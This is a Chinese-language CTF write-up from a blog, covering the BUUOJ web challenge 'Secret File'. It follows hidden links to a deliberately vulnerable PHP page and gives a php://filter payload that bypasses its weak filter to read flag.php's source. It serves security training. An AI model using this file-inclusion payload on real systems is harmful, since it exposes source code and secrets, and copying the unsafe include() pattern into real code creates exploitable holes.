首页 > 其他分享 >[极客大挑战 2019]Secret File

[极客大挑战 2019]Secret File

时间:2024-11-02 23:09:14浏览次数:1  
标签:极客 text Secret 2019 php 页面

题目链接:https://buuoj.cn/challenges#[极客大挑战 2019]Secret File。

打开环境后如下所示。

通过 BurpSuite 抓包后,发现页面源代码如下。

<!DOCTYPE html>

<html>

<style type="text/css" >
#master {
    position:absolute;
    left:44%;
    bottom:0;
    text-align :center;
        }
        p,h1 {
                cursor: default;
        }
</style>

        <head>
                <meta charset="utf-8">
                <title>蒋璐源的秘密</title>
        </head>

        <body style="background-color:black;"><br><br><br><br><br><br>

            <h1 style="font-family:verdana;color:red;text-align:center;">你想知道蒋璐源的秘密么?</h1><br><br><br>

            <p style="font-family:arial;color:red;font-size:20px;text-align:center;">想要的话可以给你,去找吧!把一切都放在那里了!</p>
            <a id="master" href="./Archive_room.php" style="background-color:#000000;height:70px;width:200px;color:black;left:44%;cursor:default;">Oh! You found me</a>
            <div style="position: absolute;bottom: 0;width: 99%;"><p align="center" style="font:italic 15px Georgia,serif;color:white;"> Syclover @ cl4y</p></div>
        </body>
</html>

可以发现,存在一个 "Archive_room.php" 文件,访问该页面的页面源码如下。

<!DOCTYPE html>

<html>

<style type="text/css" >
#master	{
    position:absolute;
    left:44%;
    bottom:20;
    text-align :center;
    	}
        p,h1 {
                cursor: default;
        }
</style>

	<head>
		<meta charset="utf-8">
		<title>绝密档案</title>
	</head>

	<body style="background-color:black;"><br><br><br><br><br><br>

		<h1 style="font-family:verdana;color:red;text-align:center;">
		我把他们都放在这里了,去看看吧		<br>
		</h1><br><br><br><br><br><br>
		<a id="master" href="./action.php" style="background-color:red;height:50px;width:200px;color:#FFFFFF;left:44%;">
			<font size=6>SECRET</font>
		</a>
	<div style="position: absolute;bottom: 0;width: 99%;"><p align="center" style="font:italic 15px Georgia,serif;color:white;"> Syclover @ cl4y</p></div>
	</body>

</html>

可以发现,又发现了一个 "action.php" 文件,访问该页面的响应包如下。

HTTP/1.1 302 Found
Server: openresty
Date: Wed, 23 Oct 2024 16:09:38 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/7.3.11
Location: end.php
Cache-Control: no-cache
Content-Length: 63

<!DOCTYPE html>

<html>
<!--
   secr3t.php    
-->
</html>

可以发现,又发现了一个 "secr3t.php" 文件,访问该页面的情况如下。

<html>
    <title>secret</title>
    <meta charset="UTF-8">
<?php
    highlight_file(__FILE__);
    error_reporting(0);
    $file=$_GET['file'];
    if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
        echo "Oh no!";
        exit();
    }
    include($file); 
//flag放在了flag.php里
?>
</html>

可以发现,该页面存在一个文件包含漏洞,与 "[ACTF2020 新生赛]Include" 类似,直接使用 php:// 伪协议读取 flag.php 文件的源码即可。

Payload:?file=php://filter/read=convert.base64-encode/resource=flag.php

将 Base64 字符串解码后即可发现 flag。

标签:极客,text,Secret,2019,php,页面
From: https://www.cnblogs.com/imtaieee/p/18522676

相关文章

  • [极客大挑战 2019]Http
    题目链接:https://buuoj.cn/challenges#[极客大挑战2019]Http。访问环境如下。该页面的响应包如下。HTTP/1.1200OKDate:Wed,23Oct202416:21:45GMTServer:Apache/2.2.15(CentOS)X-Powered-By:PHP/5.3.3Content-Length:4065Connection:closeContent-Type:te......
  • [极客大挑战 2019]Upload
    题目链接:https://buuoj.cn/challenges#[极客大挑战2019]Upload。打开环境,如下所示。通过页面源代码可以发现,该网站系PHP架构,因此尝试直接上传一句话木马。发现提示"NOT!php!",因此尝试fuzzing一下后缀名。发现网站可以通过了"phtml"的后缀名,但是提示文件内容存在字符......
  • [转]创建Visual Studio 2019离线安装包
    可以在不同的网络环境和不同的计算机上在线安装微软VisualStudio2019。微软提供的在线安装工具(VisualStudiowebinstaller)可以让用户在线下载最新版本VisualStudio安装包、补丁程序等。但是在许多场景中,用户并不能连接到互联网,或者由于防火墙的安全策略导致用户不能连接微软......
  • 地级市-计算恩格尔系数(2001-2019年)
    数据文档数据介绍数据名称:地级市-计算恩格尔系数数据年份:2001-2019年数据范围:全国297个城市数据来源:地方统计局指标说明行政区划代码人均消费支出-农村-食品地区名称人均消费支出-城镇年份人均消费支出-城镇-食品人均消费支出人均消费支出-食品人均消费支出-......
  • [GXYCTF2019]Ping Ping Ping
    题目链接:https://buuoj.cn/challenges#[GXYCTF2019]PingPingPing打开环境后如下所示。题目直接提示了有一个GET参数,参数名是"ip",尝试输入:?ip=127.0.0.1后,结果如下所示。可以看到,网站后端进行了一个ping操作,猜测参数:ip可能存在命令注入漏洞。尝试输入:ip=;id,发现可以......
  • [极客大挑战 2019]Havefun
    链接:https://buuoj.cn/challenges#[极客大挑战2019]Havefun打开环境后如下所示。在BurpSuite中(或直接CTRL+U)查看源代码后,可以发现存在如下代码。$cat=$_GET['cat'];echo$cat;if($cat=='dog'){echo'Syc{cat_cat_cat_cat}';}尝试输入Payload:?cat=dog后即可......
  • [极客大挑战 2019]EasySQL
    题目链接:https://buuoj.cn/challenges#[极客大挑战2019]EasySQL。打开后,页面如下所示:可以看到,只有一个登录框,没有其他的内容,一般这种情况,应当先考虑SQL注入。在密码框中直接插入万能密码:'or1=1;#。成功获取flag。知其然,知其所以然。一些常见的登陆功能的后端实现......
  • [GXYCTF2019]Ping Ping Ping
    题目链接:https://buuoj.cn/challenges#[GXYCTF2019]PingPingPing打开环境后如下所示。题目直接提示了有一个GET参数,参数名是"ip",尝试输入:?ip=127.0.0.1后,结果如下所示。可以看到,网站后端进行了一个ping操作,猜测参数:ip可能存在命令注入漏洞。尝试输入:ip=;id,发现可以......
  • [SUCTF 2019]EasySQL
    题目链接:https://buuoj.cn/challenges#[SUCTF2019]EasySQL打开环境后,如下所示。尝试输入字符:1。尝试输入字符:0后,发现没有输出结果。尝试输入字符串"aaa"、"bbb"等后,发现都跟输入0的结果一致,而输入123、456等非0的内容,都与输入1一致,这里可以猜测(实际上需要比较......
  • [强网杯 2019]随便注
    题目链接:https://buuoj.cn/challenges#[强网杯2019]随便注打开环境后,如下所示。通过输入',确认该处是由单引号闭合。通过输入Payload:'unionselect1;#,可以发现后端对一些关键词进行了过滤。尝试堆叠注入,可以查询到数据库名以及当前使用的数据库中存在的表名。Payload:'%......